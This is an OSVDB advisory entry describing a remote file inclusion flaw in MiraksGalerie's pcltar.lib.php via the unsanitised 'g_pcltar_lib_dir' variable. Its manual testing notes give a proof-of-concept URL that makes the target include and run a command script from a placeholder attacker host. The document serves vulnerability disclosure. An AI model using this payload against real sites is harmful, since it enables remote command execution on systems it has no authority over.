MiraksGalerie pcltar.lib.php g_pcltar_lib_dir Variable Remote File Inclusion

2006-06-06T08:34:03
ID OSVDB:26194
Type osvdb
Reporter Federico Fazzi(federico@autistici.org)
Modified 2006-06-06T08:34:03

Description

Vulnerability Description

MiraksGalerie contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to pcltar.lib.php script not properly sanitizing user input supplied to the 'g_pcltar_lib_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

MiraksGalerie contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to pcltar.lib.php script not properly sanitizing user input supplied to the 'g_pcltar_lib_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[mg_path]/pcltar.lib.php?g_pcltar_lib_dir=http://[attacker]/cmd.php?exec=uname

References:

Vendor URL: http://www.miraks.com/index.php?url=print_outils&id=2022 Secunia Advisory ID:20475 Related OSVDB ID: 26196 Related OSVDB ID: 26195 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0047.html FrSIRT Advisory: ADV-2006-2187 CVE-2006-2187 Bugtraq ID: 18313